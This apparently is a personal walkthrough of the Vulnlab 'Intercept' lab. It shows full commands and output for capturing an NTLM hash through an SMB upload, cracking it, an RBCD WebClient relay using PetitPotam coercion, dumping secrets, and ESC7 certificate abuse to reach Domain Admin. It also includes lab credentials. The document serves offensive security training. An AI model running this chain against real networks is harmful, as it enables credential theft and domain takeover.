vulnlab-intercept

vulnlab intercept

Intercept is a hard rated chain which contains two machines WS01 and DC01. The chain starts with forced authentication using a file upload to grab a users hash. Using this user we performed the Resourced Based Contrained Delegation (RBCD) WebClient attack to escalate privileges. Finally using ESC7 we elevate privileges to Domain Admin.

 

.

$ smbclient -L \\\\ws01.intercept.vl
Password for [WORKGROUP\puck]:

    Sharename       Type      Comment
    ---------       ----      -------
    ADMIN$          Disk      Remote Admin
    C$              Disk      Default share
    dev             Disk      shared developer workspace
    IPC$            IPC       Remote IPC
    Users           Disk      
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to ws01.intercept.vl failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

.

upload files to smb share and capture hashes with smbserver.py/responder

$ impacket-smbserver share share -smb2support
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.250.118,63690)
[*] AUTHENTICATE_MESSAGE (INTERCEPT\Kathryn.Spencer,WS01)
[*] User WS01\Kathryn.Spencer authenticated successfully
[*] Kathryn.Spencer::INTERCEPT:aaaaaaaaaaaaaaaa:3737678866bc6c44728f496ace58b114:01010000000000008055d8e29dfeda01350bcbc48ec2e8230000000001001000520058006b004200550077007300630003001000520058006b0042005500770073006300020010006b00410053007600490063004d006e00040010006b00410053007600490063004d006e00070008008055d8e29dfeda0106000400020000000800300030000000000000000000000000200000e7ded09557c36a93b2b02ef519d8e02660849fc8954d8c72827bfb1b0d13774a0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e0038002e0032002e003100330038000000000000000000
[*] Connecting Share(1:IPC$)
[-] SMB2_TREE_CONNECT not found x

.

$ smbclient \\\\ws01.intercept.vl\\dev

next we crack the hash

The hash identifier for NetNTLMv2 hashes is 5600. You can find this within the hashcat example hashes page.

hashcat -a 0 -m 5600 hash.txt /usr/share/wordlists/rockyou.txt -o cracked

try spraying the password on other domain users

ldapsearch -x -LLL -H ldap://dc01.intercept.vl -D 'kathryn.spencer@intercept.vl' -b 'DC=intercept,DC=vl' -w 'Chocolate1' | grep userPrincipalName | awk '{print $2}' | cut -d '@' -f 1 > allusers.txt

netexec smb ws01.intercept.vl -u allusers.txt -p Chocolate1 --continue-on-success

But no result,

I also use ldapdomaindump to get some domain info in HTML format

python -m ldapdomaindump -u 'intercept.vl\Kathryn.Spencer' -p 'Chocolate1' -o ldap/ 10.10.145.245

next we do some bloodhound analysis

$ bloodhound-python -c all --disable-pooling -w 1 -u kathryn.spencer -p 'Chocolate1' -d intercept.vl -dc dc01.intercept.vl -ns 10.10.145.245 --dns-tcp --zip --dns-timeout 120

.

Check LDAP signing [ not enforced = default ]

$ netexec ldap 10.10.250.117 -u kathryn.spencer -p Chocolate1 -M ldap-checker 
SMB         10.10.250.117   445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:intercept.vl) (signing:True) (SMBv1:False)
LDAP        10.10.250.117   389    DC01             [+] intercept.vl\kathryn.spencer:Chocolate1 
LDAP-CHE... 10.10.250.117   389    DC01             LDAP Signing NOT Enforced!
LDAP-CHE... 10.10.250.117   389    DC01             LDAPS Channel Binding is set to "NEVER"

Check Machine Quota [ 10 = default ]

$ netexec ldap 10.10.250.117 -u kathryn.spencer -p Chocolate1 -M maq         
SMB         10.10.250.117   445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:intercept.vl) (signing:True) (SMBv1:False)
LDAP        10.10.250.117   389    DC01             [+] intercept.vl\kathryn.spencer:Chocolate1 
MAQ         10.10.250.117   389    DC01             [*] Getting the MachineAccountQuota
MAQ         10.10.250.117   389    DC01             MachineAccountQuota: 10

Check WebDAV service is also enabled  [ enabled = not default]

$ netexec ldap 10.10.250.117 -u kathryn.spencer -p Chocolate1 -M webdav

.

RBCD WebClient Attack

Now that we know that the WebDAV service is active on WS01, LDAP Signing is disabled on the DC, and we can add machine accounts to the domain, we can abuse these conditions in combination with coerced authentication to escalate privileges. However, when relaying our coercion and add RBCD permissions to WS01 the authenticated connection has to originate from a trusted intranet zone. Luckily for us by default the “Authenticated Users” group can create child objects on the ADIDNS zone.

 

Preparing

$ python3 -m venv venv
$ source venv/bin/activate
$ pip install ldap3 dnspython
$ pip install ldapdomaindump
$ git clone https://github.com/CoreSecurity/impacket.git
$ cd impacket
$ python setup.py install
┌──(venv)─(puck㉿kali)-[~/vulnlab/intercept/impacket]
└─$ ntlmrelayx.py -t ldaps://10.10.250.117 --delegate-access -smb2support
└─$ deactivate

.

$ git clone https://github.com/dirkjanm/krbrelayx.git

.

here it goes

Set your local dns server to the dc ip in /etc/resolv.conf before running

┌──(puck㉿kali)-[~/vulnlab/intercept]
└─$ cat /etc/resolv.conf 
# Generated by NetworkManager
search home
nameserver 10.10.177.37

.

Add new dns entry that points to our attacker machine

$ python3 ./krbrelayx/dnstool.py -u 'INTERCEPT.vl\Kathryn.Spencer' dc01.intercept.vl --tcp -p Chocolate1 -a add -t A -r kali.intercept.vl -d 10.8.2.138
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully

.

Verify if A-record is created on our attacker machine

$ nslookup kali.intercept.vl 10.10.177.37      
Server:		10.10.177.37
Address:	10.10.177.37#53

Name:	kali.intercept.vl
Address: 10.8.2.138

 

Add a new machine account

.

┌──(venv)─(puck㉿kali)-[~/vulnlab/intercept]
└─$ impacket-addcomputer -computer-name 'WS02$' -computer-pass 'Start123!' -dc-host dc01.intercept.vl -domain-netbios intercept  'INTERCEPT/Kathryn.Spencer:Chocolate1'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Successfully added machine account WS02$ with password Start123!.

.

Listener for relaying auth to LDAP on the DC in order to configure RBCD on WS01$ (it's allowed to write it's own attribute)

┌──(venv)─(puck㉿kali)-[~/vulnlab/intercept]
└─$ sudo impacket-ntlmrelayx -smb2support -t ldaps://dc01.intercept.vl --http-port 8080 --delegate-access --escalate-user WS02\$ --no-dump --no-acl --no-da
[sudo] password for puck: 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Protocol Client DCSYNC loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 8080
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666

[*] Servers started, waiting for connections
[*] HTTPD(8080): Connection from 10.10.177.38 controlled, attacking target ldaps://dc01.intercept.vl
[*] HTTPD(8080): Authenticating against ldaps://dc01.intercept.vl as INTERCEPT/WS01$ SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] HTTPD(8080): Connection from 10.10.177.38 controlled, but there are no more targets left!
[*] Delegation rights modified succesfully!
[*] WS02$ can now impersonate users on WS01$ via S4U2Proxy

.Coerce Authentication from the workstation WS01$ using a non-default port so it's a WebDAV authentication

┌──(puck㉿kali)-[~/vulnlab/intercept]
└─$ python3 ./krbrelayx/PetitPotam.py -d intercept.vl -u 'Kathryn.Spencer' -p 'Chocolate1' kali@8080/a ws01.intercept.vl    

                                         
              PoC to elicit machine account authentication via some MS-EFSRPC functions
                                      by topotam (@topotam77)
      
                     Inspired by @tifkin_ & @elad_shamir previous work on MS-RPRN


Trying pipe lsarpc
[-] Connecting to ncacn_np:ws01.intercept.vl[\PIPE\lsarpc]
[+] Connected!
[+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!
[-] Got RPC_ACCESS_DENIED!! EfsRpcOpenFileRaw is probably PATCHED!
[+] OK! Using unpatched function!
[-] Sending EfsRpcEncryptFileSrv!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!

.Impersonate Administrator on WS01 by using our RBCD privileges

┌──(puck㉿kali)-[~/vulnlab/intercept]
└─$ impacket-getST -spn cifs/ws01.intercept.vl intercept.vl/WS02\$ -impersonate administrator
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Password:Start123!
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in administrator@cifs_ws01.intercept.vl@INTERCEPT.VL.ccache

.

$ export KRB5CCNAME=administrator@cifs_ws01.intercept.vl@INTERCEPT.VL.ccache

.

$ impacket-secretsdump -k -no-pass ws01.intercept.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Service RemoteRegistry is in stopped state
[*] Service RemoteRegistry is disabled, enabling it
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x04718518c7f81484a5ba5cc7f16ca912
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:83<redacted>82:::
..snip..
[*] _SC_HelpdeskService 
Simon.Bowen@intercept.vl:b0OI_fHO859+Aw
[*] Cleaning up... 
[*] Stopping service RemoteRegistry
[*] Restoring the disabled state for service RemoteRegistry

What a ride

next

Using certipy to enumerate ADCS, we can see that one of the groups that has the ManageCA permission is the ca-managers group, which simon.bowen has GenericAll permissions over

$ certipy-ad find -username 'Simon.Bowen' -password 'b0OI_fHO859+Aw' -vulnerable -dc-ip 10.10.145.245 -stdout            
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Trying to get CA configuration for 'intercept-DC01-CA' via CSRA
[*] Got CA configuration for 'intercept-DC01-CA'
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : intercept-DC01-CA
    DNS Name                            : DC01.intercept.vl
    Certificate Subject                 : CN=intercept-DC01-CA, DC=intercept, DC=vl
    Certificate Serial Number           : 4CEE597D2BE3DC9E4F5CDA8401EA6373
    Certificate Validity Start          : 2023-06-27 13:24:59+00:00
    Certificate Validity End            : 2124-09-05 07:48:03+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : INTERCEPT.VL\Administrators
      Access Rights
        Enroll                          : INTERCEPT.VL\Authenticated Users
        ManageCa                        : INTERCEPT.VL\ca-managers
                                          INTERCEPT.VL\Domain Admins
                                          INTERCEPT.VL\Enterprise Admins
                                          INTERCEPT.VL\Administrators
        ManageCertificates              : INTERCEPT.VL\Domain Admins
                                          INTERCEPT.VL\Enterprise Admins
                                          INTERCEPT.VL\Administrators
    [!] Vulnerabilities
      ESC7                              : 'INTERCEPT.VL\\ca-managers' has dangerous permissions
Certificate Templates                   : [!] Could not find any certificate templates

.

Since simon.bowen is apart of a group that has control of the ca-managers group, he can write himself into the group

net rpc group addmem "ca-managers" "Simon.Bowen" -U "intercept.vl"/"Simon.Bowen"%"<simon's password :)>" -S <dc01 IP>

.

ESC 7 Exploitation

Now we have a user that has ManageCA permission on the CA, we can successfully abuse ESC 7

Add the user as an officer

$ certipy-ad ca -ca 'intercept-DC01-CA' -username 'Simon.Bowen@intercept.vl' -password 'b0OI_fHO859+Aw' -dc-ip '10.10.145.245' -add-officer  simon.bowen 
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Successfully added officer 'Simon.Bowen' on 'intercept-DC01-CA'

Enable the SubCA template – This certificate is configured by default to allow for authentication, therefore we should enable it to be used

$ certipy-ad ca -ca 'intercept-DC01-CA' -username 'Simon.Bowen@intercept.vl' -password 'b0OI_fHO859+Aw' -dc-ip '10.10.145.245' -enable-template SubCA
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Successfully enabled 'SubCA' on 'intercept-DC01-CA'

Now request a certificate with the userPrincipalName (uPN) of the Administrator

  • This request will get automatically denied, however, since Simon is an officer we can manually issue a certificate
$ certipy-ad req -username 'Simon.Bowen@intercept.vl' -password 'b0OI_fHO859+Aw' -dc-ip '10.10.145.245' -ca 'intercept-DC01-CA' -template SubCA -upn 'Administrator@intercept.vl' 
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate.
[*] Request ID is 6
Would you like to save the private key? (y/N) y
[*] Saved private key to 6.key
[-] Failed to request certificate

Issue the request

$ certipy-ad ca -ca 'intercept-DC01-CA' -username 'Simon.Bowen@intercept.vl' -password 'b0OI_fHO859+Aw' -dc-ip '10.10.145.245' -issue-request 6                                  
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Successfully issued certificate

Get the certificate

$ certipy-ad req -username 'Simon.Bowen@intercept.vl' -password 'b0OI_fHO859+Aw' -dc-ip '10.10.145.245' -ca 'intercept-DC01-CA' -retrieve 6  
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Rerieving certificate with ID 6
[*] Successfully retrieved certificate
[*] Got certificate with UPN 'Administrator@intercept.vl'
[*] Certificate has no object SID
[*] Loaded private key from '6.key'
[*] Saved certificate and private key to 'administrator.pfx'

Authenticate with the PFX to the DC

$ certipy-ad auth -pfx administrator.pfx -domain intercept.vl -username administrator -dc-ip '10.10.145.245'         
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@intercept.vl
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@intercept.vl': aad3b435b51404eeaad3b435b51404ee:ad<redacted>1f

check

$ netexec smb dc01.intercept.vl -u Administrator -H ad<redacted>1f 

.

$ evil-winrm -i 10.10.145.245 -u Administrator -H 'ad<redacted>1f'

This was super fun.

Resources